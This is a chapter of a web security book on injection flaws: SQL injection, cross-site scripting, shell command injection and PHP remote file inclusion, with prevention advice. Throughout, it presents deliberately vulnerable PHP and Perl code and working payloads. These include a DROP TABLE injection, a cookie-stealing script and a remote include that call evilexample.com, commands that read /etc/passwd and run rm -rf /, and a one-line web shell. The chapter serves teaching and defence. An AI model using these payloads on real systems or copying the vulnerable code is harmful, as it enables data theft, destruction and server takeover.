10.6. Injection Flaws

Finally, we reach a type of flaw that can cause serious damage. If you thought the flaws we have covered were mostly harmless, you would be right. But those flaws were a preparation (in this book, and in successful compromise attempts) for what follows.

Injection flaws get their name because when they are used, malicious user-supplied data flows through the application, crosses system boundaries, and gets injected into another system component. System boundaries can be tricky because a text string that is harmless for PHP can turn into a dangerous weapon when it reaches a database.

Injection flaws come in as many flavors as there are component types. Three flaws are particularly important because practically every web application can be affected:

SQL injection: When an injection flaw causes user input to modify an SQL query in a way that was not intended by the application author
Cross-site scripting (XSS): When an attacker gains control of a user's browser by injecting HTML and JavaScript code into the page
Operating system command execution: When an attacker executes shell commands on the server

Other types of injection are also feasible. Papers covering LDAP injection and XPath injection are listed in Section 10.9.

10.6.1. SQL Injection

SQL injection attacks are among the most common because nearly every web application uses a database to store and retrieve data. Injections are possible because applications typically use simple string concatenation to construct SQL queries, but fail to sanitize input data.

10.6.1.1 A working example

SQL injections are fun if you are not at the receiving end. We will use a complete programming example and examine how these attacks take place. We will use PHP and MySQL 4.x. You can download the code from the book web site, so do not type it.

Create a database with two tables and a few rows of data. The database represents an imaginary bank where my wife and I keep our money.

CREATE DATABASE sql_injection_test;
   
USE sql_injection_test;
   
CREATE TABLE customers (
    customerid INTEGER NOT NULL,
    username CHAR(32) NOT NULL,
    password CHAR(32) NOT NULL,
    PRIMARY KEY(customerid)
);
   
INSERT INTO customers ( customerid, username, password )
    VALUES ( 1, 'ivanr', 'secret' );
   
INSERT INTO customers ( customerid, username, password )
    VALUES ( 2, 'jelena', 'alsosecret' );
   
CREATE TABLE accounts (
    accountid INTEGER NOT NULL,
    customerid INTEGER NOT NULL,
    balance DECIMAL(9, 2) NOT NULL,
    PRIMARY KEY(accountid)
);
   
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 1, 1, 1000.00 );
   
INSERT INTO accounts ( accountid, customerid, balance )
    VALUES ( 2, 2, 2500.00 );

Create a PHP file named view_customer.php with the following code inside, and set the values of the variables at the top of the file as appropriate to enable the script to establish a connection to your database:

<?
   
$dbhost = "localhost";
$dbname = "sql_injection_test";
$dbuser = "root";
$dbpass = "";
   
// connect to the database engine
if (!mysql_connect($dbhost, $dbuser, $dbpass)) {
   die("Could not connect: " . mysql_error( ));
}
   
// select the database
if (!mysql_select_db($dbname)) {
   die("Failed to select database $dbname:" . mysql_error( ));
}
   
// construct and execute query
$query = "SELECT username FROM customers WHERE customerid = "
    . $_REQUEST["customerid"];
   
$result = mysql_query($query);
if (!$result) {
   die("Failed to execute query [$query]: " . mysql_error( ));
}
   
// show the result
while ($row = mysql_fetch_assoc($result)) {
    echo "USERNAME = " . $row["username"] . "<br>";
}
   
// close the connection
mysql_close( );
   
?>

This script might be written by a programmer who does not know about SQL injection attacks. The script is designed to accept the customer ID as its only parameter (named customerid). Suppose you request a page using the following URL:

http://www.example.com/view_customer.php?customerid=1

The PHP script will retrieve the username of the customer (in this case, ivanr) and display it on the screen. All seems well, but what we have in the query in the PHP file is the worst-case SQL injection scenario. The customer ID supplied in a parameter becomes a part of the SQL query in a process of string concatenation. No checking is done to verify that the parameter is in the correct format. Using simple URL manipulation, the attacker can inject SQL commands directly into the database query, as in the following example:

http://www.example.com/view_customer.php?customerid=1%20OR%20customerid%3D2

If you specify the URL above, you will get two usernames displayed on the screen instead of the single one the programmer intended the program to supply. Notice how we have URL-encoded some characters to put them into the URL, specifying %20 for the space character and %3D for an equals sign. These characters have special meanings when they are a part of a URL, so we had to hide them to make the URL work. After the URL is decoded and the specified customerid sent to the PHP program, this is what the query looks like (the user-supplied data is everything after "customerid = "):

SELECT username FROM customers WHERE customerid = 1 OR customerid=2
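One way to close this particular hole is to check that the parameter really is an integer before it gets anywhere near the query. The following is a minimal sketch using PHP's filter_var( ) function. The helper name parse_customer_id is hypothetical and is not part of the original script.

```php
<?php
// Hypothetical helper (not part of the original script): returns the
// customer ID as an integer, or null if the input is not a positive integer.
function parse_customer_id($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1],
    ]);
    return $id === false ? null : $id;
}

// A genuine ID passes; the injected fragment from the URL above does not.
var_dump(parse_customer_id('1'));                  // int(1)
var_dump(parse_customer_id('1 OR customerid=2'));  // NULL
```

A script using such a helper would refuse to build the query at all when the result is null, rather than trying to repair the input.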

This type of SQL injection is the worst-case scenario because the input data is expected to be an integer, and in that case many programmers neglect to validate the incoming value. Genuine integers can go into an SQL query directly because they cannot cause a query to fail: integers consist only of digits, and digits do not have a special meaning in SQL. The problem is that nothing guarantees the parameter actually contains an integer.

Strings, unlike integers, can contain special characters (such as single quotation marks) so they have to be converted into a representation that will not confuse the database engine. This process is called escaping and is usually performed by preceding each special character with a backslash character. Imagine a query that retrieves the customer ID based on the username. The code might look like this:

$query = "SELECT customerid FROM customers WHERE username = '"
    . $_REQUEST["username"] . "'";

You can see that the data we supply goes into the query, surrounded by single quotation marks. That is, if your request looks like this:

http://www.example.com/view_customer.php?username=ivanr

the query becomes:

SELECT customerid FROM customers WHERE username = 'ivanr'

Appending malicious data to the page parameter as we did before will do little damage because whatever is surrounded by quotes will be treated by the database as a string and not a query. To change the query an attacker must terminate the string using a single quote, and only then continue with the query. Assuming the previous query construction, the following URL would perform an SQL injection:

http://www.example.com/view_customer.php?username=ivanr'%20OR%20username%3D'jelena'--%20

By adding a single quote to the username parameter, we terminated the string and entered the query space. However, to make the query work, we added an SQL comment start (--) at the end, neutralizing the single quote appended at the end of the query in the code. The query becomes:

SELECT customerid FROM customers WHERE username = 'ivanr'
OR username='jelena'-- '

The query returns two customer IDs, rather than the one intended by the programmer. This type of attack is actually often more difficult to do than the attack in which single quotes were not used because some environments (PHP, for example) can be configured to automatically escape single quotes that appear in the input URL. That is, they may change a single quote (') that appears in the input to \', in which the backslash indicates that the single quote following it should be interpreted as the single quote character, not as a quote delimiting a string. Even programmers who are not very security-conscious will often escape single quotes because not doing so can lead to errors when an attempt is made to enter a name such as O'Connor into the application.

Though the examples so far included only the SELECT construct, INSERT, UPDATE, and DELETE statements are equally vulnerable. The only way to avoid SQL injection problems is to avoid using simple string concatenation as a way to construct queries. A better (and safe) approach is to use prepared statements. In this approach, a query template is given to the database, followed by the separate user data. The database will then construct the final query, ensuring no injection can take place.
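The prepared statement approach can be sketched with PHP's PDO extension. This is an illustration under stated assumptions, not the book's own code: an in-memory SQLite database stands in for MySQL so the example runs without a server, and the helper name find_customer_ids is hypothetical.

```php
<?php
// Assumption: an in-memory SQLite database stands in for the MySQL
// database used in this section, so the sketch needs no server.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$db->exec("CREATE TABLE customers (
    customerid INTEGER NOT NULL PRIMARY KEY,
    username CHAR(32) NOT NULL,
    password CHAR(32) NOT NULL
)");
$db->exec("INSERT INTO customers VALUES (1, 'ivanr', 'secret')");
$db->exec("INSERT INTO customers VALUES (2, 'jelena', 'alsosecret')");

// Hypothetical helper: the query template and the user data travel
// separately, so the data cannot change the structure of the query.
function find_customer_ids(PDO $db, string $username): array
{
    $stmt = $db->prepare('SELECT customerid FROM customers WHERE username = ?');
    $stmt->execute([$username]);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// The legitimate request finds one customer.
print_r(find_customer_ids($db, 'ivanr'));

// The injection string is compared as a literal username, matches
// nothing, and produces an empty array.
print_r(find_customer_ids($db, "ivanr' OR username='jelena'-- "));
```

With a MySQL server, only the connection string passed to the PDO constructor should need to change; the prepare( ) and execute( ) calls stay the same.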

10.6.1.2 Union

We have seen how SQL injection can be used to access data from a single table. If the database system supports the UNION construct (which MySQL does as of Version 4), the same concept can be used to fetch data from multiple tables. With UNION, you can append a new query to fetch data and add it to the result set. Suppose the parameter customerid from the previous example is set as follows:

http://www.example.com/view_customer.php?customerid=1%20UNION%20ALL%20SELECT%20balance%20FROM%20accounts%20WHERE%20customerid%3D2

The query becomes:

SELECT username FROM customers WHERE customerid = 1
UNION ALL SELECT balance FROM accounts WHERE customerid=2

The original query fetches a username from the customers table. With UNION appended, the modified query fetches the username but it also retrieves an account balance from the accounts table.

10.6.1.3 Multiple statements in a query

Things become really ugly if the database system supports multiple statements in a single query. Though our attacks so far were a success, there were still two limitations:

We had to append our query fragment to an existing query, which limited what we could do with the query.
We were limited to the type of the query used by the programmer. A SELECT query could not turn into DELETE or DROP TABLE.

With multiple statements possible, we are free to submit a custom-crafted query to perform any action on the database (limited only by the permissions of the user connecting to the database).

When allowed, statements are separated by a semicolon. Going back to our first example, here is the URL to remove all customer information from the database:

http://www.example.com/view_customer.php?customerid=1;DROP%20TABLE%20customers

After SQL injection takes place, the second SQL query to be executed will be DROP TABLE customers.

10.6.1.4 Special database features

Exploiting SQL injection flaws can be hard work because there are many database engines, and each engine supports different features and a slightly different syntax for SQL queries. The attacker usually works to identify the type of database and then proceeds to research its functionality in an attempt to use some of it.

Databases have special features that make life difficult for those who need to protect them:

You can usually enumerate the tables in the database and the fields in a table. You can retrieve values of various database parameters, some of which may contain valuable information. The exact syntax depends on the database in place.
Microsoft SQL Server ships with over 1,000 built-in stored procedures. Some do fancy stuff such as executing operating system code, writing query output into a file, or performing full database backup over the Internet (to the place of the attacker's choice, of course). Stored procedures are the first feature attackers will go for if they discover an SQL injection vulnerability in a Microsoft SQL Server installation.
Many databases can read and write files, usually to perform data import and export. These features can be exploited to output the contents of the database, where it can be accessed by an attacker. (This MySQL feature was instrumental in compromising Apache Foundation's own web site, as described at http://www.dataloss.net/papers/how.defaced.apache.org.txt.)

10.6.1.5 SQL injection attack resources

We have only exposed the tip of the iceberg with our description of SQL injection flaws. Because they are the most popular type of flaw, they have been heavily researched. You will find the following papers useful to learn more about such flaws.

"SQL Injection" by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/WhitepaperSQLInjection.pdf)
"Advanced SQL Injection in SQL Server Applications" by Chris Anley (NGS) (http://www.nextgenss.com/papers/advanced_sql_injection.pdf)
"(more) Advanced SQL Injection" by Chris Anley (NGS) (http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf)
"Hackproofing MySQL" by Chris Anley (NGS) (http://www.nextgenss.com/papers/HackproofingMySQL.pdf)
"Blind SQL Injection" by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/Blind_SQLInjection.pdf)
"LDAP Injection" by Sacha Faust (SPI Dynamics) (http://www.spidynamics.com/whitepapers/LDAPinjection.pdf)
"Blind XPath Injection" by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/WhitePaper_Blind_XPath_Injection.pdf)

10.6.2. Cross-Site Scripting

Unlike other injection flaws, which occur when the programmer fails to sanitize data on input, cross-site scripting (XSS) attacks occur on the output. If the attack is successful, the attacker will control the HTML source code, emitting HTML markup and JavaScript code at will.

This attack occurs when data sent to a script in a parameter appears in the response. One way to exploit this vulnerability is to make a user click on what he thinks is an innocent link. The link then takes the user to a vulnerable page, but the parameters will spice the page content with a malicious payload. As a result, malicious code will be executed in the security context of the browser.

Suppose a script contains an insecure PHP code fragment such as the following:

<? echo $_REQUEST["param"] ?>

It can be attacked with a URL similar to this one:

http://www.example.com/xss.php?param=<script>alert(document.location)</script>

The final page will contain the JavaScript code given to the script as a parameter. Opening such a page will result in a JavaScript pop-up box appearing on the screen (in this case displaying the contents of the document.location variable) though that is not what the original page author intended. This is a proof of concept you can use to test if a script is vulnerable to cross-site scripting attacks.

Email clients that support HTML and sites where users encounter content written by other users (often open communities such as message boards or web mail systems) are the most likely places for XSS attacks to occur. However, any web-based application is a potential target. My favorite example is the registration process most web sites require. If the registration form is vulnerable, the attack data will probably be permanently stored somewhere, most likely in the database. Whenever a request is made to see the attacker's registration details (newly created user accounts may need to be approved manually for example), the attack data presented in a page will perform an attack. In effect, one carefully placed request can result in attacks being performed against many users over time.

XSS attacks can have some of the following consequences:

Deception: If attackers can control the HTML markup, they can make the page look any way they want. Since URLs are limited in size, they cannot be used directly to inject a lot of content. But there is enough space to inject a frame into the page and to point the frame to a server controlled by an attacker. A large injected frame can cover the content that would normally appear on the page (or push it outside the visible browser area). When a successful deception attack takes place, the user will see a trusted location in the location bar and read the content supplied by the attacker (a handy way of publishing false news on the Internet). This may lead to a successful phishing attack.
Collection of private user information: If an XSS attack is performed against a web site where users keep confidential information, a piece of JavaScript code can gain access to the displayed pages and forms and can collect the data and send it to a remote (evil) server.
Providing access to restricted web sites: Sometimes a user's browser can go places the attacker's browser cannot. This is often the case when the user is accessing a password-protected web site or accessing a web site where access is restricted based on an IP address.
Execution of malicious requests on behalf of the user: This is an extension of the previous point. Not only can the attacker access privileged information, but he can also perform requests without the user knowing. This can prove to be difficult in the case of an internal and well-guarded application, but a determined attacker can pull it off. This type of attack is a variation on XSS and is sometimes referred to as cross-site request forgery (CSRF). It's a dangerous type of attack because, unlike XSS where the attacker must interact with the original application directly, CSRF attacks are carried out from the user's IP address and the attacker becomes untraceable.
Client workstation takeover: Though most attention is given to XSS attacks that contain JavaScript code, XSS can be used to invoke other dangerous elements, such as Flash or Java programs or even ActiveX objects. Successful activation of an ActiveX object, for example, would allow the attacker to take full control over the workstation.
Compromising of the client: If the browser is not maintained and regularly patched, it may be possible for malicious code to compromise it. An unpatched browser is a flaw of its own; the XSS attack only helps to achieve the compromise.
Session token stealing: The most dangerous consequence of an XSS attack is having a session token stolen. (Session management mechanics were discussed earlier in this chapter.) A person with a stolen session token has as much power as the user the token belongs to. Imagine an e-commerce system that works with two classes of users: buyers and administrators. Anyone can be a buyer (the more the better) but only company employees can work as administrators. A cunning criminal may register with the site as a buyer and smuggle a fragment of JavaScript code in the registration details (in the name field, for example). Sooner or later (the attacker may place a small order to speed things up, especially if it is a smaller shop) one of the administrators will access her registration details, and the session token will be transmitted to the attacker. Notified about the token, the attacker will effortlessly log into the application as the administrator. If written well, the malicious code will be difficult to detect. It will probably be reused many times as the attacker explores the administration module.

In our first XSS example, we displayed the contents of the document.location variable in a dialog box. The value of the cookie is stored in document.cookie. To steal a cookie, you must be able to send the value somewhere else. An attacker can do that with the following code:

<script>document.write('<img src=http://www.evilexample.com/'
+ document.cookie + '>')</script>

If embedding of the JavaScript code proves to be too difficult because single quotes and double quotes are escaped, the attacker can always invoke the script remotely:

<script src=http://www.evilexample.com/script.js></script>

Though these examples show how a session token is stolen when it is stored in a cookie, nothing in cookies makes them inherently insecure. All session token transport mechanisms are equally vulnerable to session hijacking via XSS.

XSS attacks can be difficult to detect because most action takes place at the browser, and there are no traces at the server. Usually, only the initial attack can be found in server logs. If one can perform an XSS attack using a POST request, then nothing will be recorded in most cases, since few deployments record POST request bodies.

One way of mitigating XSS attacks is to turn off browser scripting capabilities. However, this may prove to be difficult for typical web applications because most rely heavily on client-side JavaScript. Internet Explorer supports a proprietary extension to the Cookie standard, called HttpOnly, which allows developers to mark cookies (such as those used for session management) as off-limits to scripts. Such cookies cannot be accessed from JavaScript later. This enhancement, though not a complete solution, is an example of a small change that can result in large benefits. Unfortunately, at the time of writing, only Internet Explorer supports this feature.

XSS attacks can be prevented by designing applications to properly validate input data and escape all output. Users should never be allowed to submit HTML markup to the application. But if you have to allow it, do not rely on simple text replacement operations and regular expressions to sanitize input. Instead, use a proper HTML parser to deconstruct input data, and then extract from it only the parts you know are safe.
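Escaping on output can be sketched with PHP's built-in htmlspecialchars( ) function. The wrapper name html_escape is hypothetical, and the UTF-8 character set is an assumption about the page encoding.

```php
<?php
// Hypothetical helper: converts HTML metacharacters in untrusted data
// into entities so the browser displays them instead of interpreting them.
function html_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

$param = '<script>alert(document.location)</script>';

// Prints: &lt;script&gt;alert(document.location)&lt;/script&gt;
echo html_escape($param), "\n";
```

Applied to the vulnerable fragment shown earlier in this section, the parameter would be passed through such a function before being echoed, so the injected script arrives in the browser as harmless text.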

10.6.2.1 XSS attack resources

"The Cross Site Scripting FAQ" by Robert Auger (http://www.cgisecurity.com/articles/xss-faq.txt)
"Advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests" by CERT Coordination Center (http://www.cert.org/advisories/CA-2000-02.html)
"Understanding Malicious Content Mitigation for Web developers" by CERT Coordination Center (http://www.cert.org/tech_tips/malicious_code_mitigation.html)
"Cross-Site Scripting" by Kevin Spett (SPI Dynamics) (http://www.spidynamics.com/whitepapers/SPIcross-sitescripting.pdf)
"Cross-Site Tracing (XST)" by Jeremiah Grossman (WhiteHat Security) (http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf)
"Second-order Code Injection Attacks" by Gunter Ollmann (NGS) (http://www.nextgenss.com/papers/SecondOrderCodeInjection.pdf)
"Divide and Conquer, HTTP Response Splitting, Web Cache Poisoning Attacks, and Related Topics" by Amit Klein (Sanctum) (http://www.sanctuminc.com/pdf/whitepaper_httpresponse.pdf)

10.6.3. Command Execution

Command execution attacks take place when the attacker succeeds in manipulating script parameters to execute arbitrary system commands. These problems occur when scripts execute external commands using input parameters to construct the command lines but fail to sanitize the input data.

Command execution flaws are frequently found in Perl and PHP programs. These programming environments encourage programmers to reuse operating system binaries. For example, executing an operating system command in Perl (and PHP) is as easy as surrounding the command with backtick operators. Look at this sample PHP code:

$output = `ls -al /home/$username`;
echo $output;

This code is meant to display a list of files in a folder. If a semicolon is used in the input, it will mark the end of the first command, and the beginning of the second. The second command can be anything you want. Consider the following invocation:

http://www.example.com/view_user.php?username=ivanr;cat%20/etc/passwd

It will display the contents of the passwd file on the server.
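A more defensive version of the directory listing might validate the username first and quote it for the shell second. The sketch below only builds the command string and does not run it. The function name build_listing_command and the rule that usernames consist of letters, digits, and underscores are assumptions made for illustration.

```php
<?php
// Hypothetical helper: builds the listing command only for usernames made
// of letters, digits, and underscores; returns null for anything else.
function build_listing_command($username): ?string
{
    if (!is_string($username) || !preg_match('/\A[A-Za-z0-9_]+\z/', $username)) {
        return null;
    }
    // escapeshellarg() quotes the value as a single shell argument. It is
    // redundant after the check above but guards against later changes.
    return 'ls -al ' . escapeshellarg('/home/' . $username);
}

var_dump(build_listing_command('ivanr'));
var_dump(build_listing_command('ivanr;cat /etc/passwd'));  // NULL
```

The semicolon in the second call fails the validation step, so no command is constructed at all.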

Once the attacker compromises the server this way, he will have many opportunities to take advantage of it:

Execute any binary on the server (use your imagination)
Start a Telnet server and log into the server with privileges of the web server user
Download other binaries from public servers
Download and compile tool source code
Perform exploits to gain root access

The most commonly used attack vector for command execution is mail sending in form-to-email scripts. These scripts are typically written in Perl. They are written to accept data from a POST request, construct the email message, and use sendmail to send it. A vulnerable code segment in Perl could look like this:

# send email to the user
open(MAIL, "|/usr/lib/sendmail $email");
print MAIL "Thank you for contacting us.\n";
close MAIL;

This code never checks whether the parameter $email contains only the email address. Since the value of the parameter is used directly on the command line, an attacker could terminate the email address using a semicolon and execute any other command on the system:

http://www.example.com/feedback.php?email=ivanr@webkreator.com;rm%20-rf%20/
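The missing check can be sketched as follows. The original fragment is Perl; this is a PHP illustration of the validation step only, and the function name safe_email and the deliberately narrow address pattern are assumptions. PHP's FILTER_VALIDATE_EMAIL filter can accept some characters that are meaningful to a shell, so a stricter pattern is applied as well.

```php
<?php
// Hypothetical helper: returns the address if it looks like a plain email
// address, or null otherwise. The pattern is intentionally narrower than
// what the email standards allow, and it rejects a leading dash so the
// value cannot be mistaken for a command-line option.
function safe_email($raw): ?string
{
    if (!is_string($raw) || filter_var($raw, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9.-]+\z/', $raw)) {
        return null;
    }
    return $raw;
}

var_dump(safe_email('ivanr@webkreator.com'));           // the address itself
var_dump(safe_email('ivanr@webkreator.com;rm -rf /'));  // NULL
```

Even with validation in place, it is safer still to keep the address off the command line entirely, for example by writing it into the message headers instead.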

10.6.4. Code Execution

Code execution is a variation of command execution. It refers to execution of the code (script) that runs in the web server rather than direct execution of operating system commands. The end result is the same because attackers will only use code execution to gain command execution, but the attack vector is different. If the attacker can upload a code fragment to the server (using FTP or file upload features of the application) and the vulnerable application contains an include( ) statement that can be manipulated, the statement can be used to execute the uploaded code. A vulnerable include( ) statement is usually similar to this:

include($_REQUEST["module"] . "/index.php");

Here is an example URL with which it can be used:

http://www.example.com/index.php?module=news

In this particular example, for the attack to work the attacker must be able to create a file called index.php anywhere on the server and then place the full path to it in the module parameter of the vulnerable script.

As discussed in Chapter 3, the allow_url_fopen feature of PHP is extremely dangerous and enabled by default. When it is used, any file operation in PHP will accept and use a URL as a filename. When used in combination with include( ), PHP will download and execute a script from a remote server (!):

http://www.example.com/index.php?module=http://www.evilexample.com

Another feature, register_globals, can contribute to exploitation. Fortunately, this feature is disabled by default in recent PHP versions. I strongly advise you to keep it disabled. Even when the script is not using input data in the include() statement, it may use the value of some other variable to construct the path:

include($TEMPLATES . "/template.php");

With register_globals enabled, the attacker can possibly override the value of the $TEMPLATES variable, with the end result being the same:

http://www.example.com/index.php?TEMPLATES=http://www.evilexample.com

It's even worse if the PHP code only uses a request parameter to locate the file, as in the following example:

include($parameter);

When the register_globals option is enabled and the request is of the multipart/form-data type (the attacker determines the type of the request, so he can choose the one that suits him best), PHP will store an uploaded file somewhere on disk and put the full path to the temporary file into the variable named after the upload field, in this case $parameter. The attacker can upload the malicious script and execute it in one go. PHP will even delete the temporary file at the end of request processing and help the attacker hide his tracks!

Other problems can also lead to code execution on the server, for example when someone manages to upload a PHP script through the FTP server and get it to execute in the web server. (See the www.apache.org compromise mentioned near the end of the "SQL Injection" section for an example.)

A frequent error is to allow content management applications to upload files (images) under the web server tree but forget to disable script execution in the folder. If someone hijacks the content management application and uploads a script instead of an image, he will be able to execute anything on the server. He will often only upload a one-line script similar to this one:

<? passthru($cmd) ?>

Try it out for yourself and see how easy it can be.
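The vulnerable include( ) statements in this section all let request data choose the file. One possible defense, sketched here under the assumption that the application has a small, fixed set of modules, is to treat the request value only as a key into a list the application controls. The names MODULES and resolve_module, and the contact module, are hypothetical.

```php
<?php
// Hypothetical module map: request values are only ever used as keys, and
// the file paths come from the application itself.
const MODULES = [
    'news'    => 'news/index.php',
    'contact' => 'contact/index.php',
];

// Returns the path to include, or null for an unknown module name.
function resolve_module($requested): ?string
{
    if (!is_string($requested) || !array_key_exists($requested, MODULES)) {
        return null;
    }
    return MODULES[$requested];
}

var_dump(resolve_module('news'));                        // the news path
var_dump(resolve_module('http://www.evilexample.com'));  // NULL
```

A script would call include( ) only when the function returns a path, so neither a remote URL nor a path to an uploaded file can ever reach the statement.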

10.6.5. Preventing Injection Attacks

Injection attacks can be prevented if proper thought is given to the problem in the software design phase. These attacks can occur anywhere that characters with a special meaning, metacharacters, are mixed with data. There are many types of metacharacters. Each system component can use different metacharacters for different purposes. In HTML, for example, special characters are &, <, >, ", and '. Problems only arise if the programmer does not take steps to handle metacharacters properly.

To prevent injection attacks, a programmer needs to perform four steps:

Identify system components
Identify metacharacters for each component
Validate data on input of every component (e.g., to ensure a variable contains an email address, if it should)
Transform data on input of every component to neutralize metacharacters (e.g., to neutralize the ampersand character (&) that appears in user data and needs to be a part of an HTML page, it must be converted to &amp;)

Data validation and transformation should be automated wherever possible. For example, if transformation is performed in each script then each script is a potential weak point. But if scripts use an intermediate library to retrieve user input and the library contains functionality to handle data validation and transformation, then you only need to make sure the library works as expected. This principle can be extended to cover all data manipulation: never handle data directly, always use a library.
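The intermediate library described above might look something like the following minimal sketch. The class name Input, its methods, and the html( ) function are hypothetical, and a real library would cover many more data types and components.

```php
<?php
// Hypothetical input library: scripts ask it for typed values instead of
// reading request arrays directly, so validation lives in one place.
final class Input
{
    private $data;

    public function __construct(array $data)
    {
        $this->data = $data;
    }

    // Returns the named parameter as an integer, or null if it is
    // missing or not a valid integer.
    public function getInt(string $name): ?int
    {
        $value = filter_var($this->data[$name] ?? null, FILTER_VALIDATE_INT);
        return $value === false ? null : $value;
    }

    // Returns the named parameter if it is a syntactically valid email
    // address, or null otherwise.
    public function getEmail(string $name): ?string
    {
        $value = filter_var($this->data[$name] ?? null, FILTER_VALIDATE_EMAIL);
        return $value === false ? null : $value;
    }
}

// Output transformation for the HTML component.
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

$input = new Input(['customerid' => '1 OR customerid=2']);
var_dump($input->getInt('customerid'));  // NULL
echo html('A & B'), "\n";                // A &amp; B
```

In a web script, the constructor would typically receive $_REQUEST, and no other code would touch that array directly.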

The metacharacter problem can be avoided if control information is transported independently from data. In such cases, special characters that occur in data lose all their powers, transformation is unnecessary and injection attacks cannot succeed. The use of prepared statements to interact with a database is one example of control information and data separation.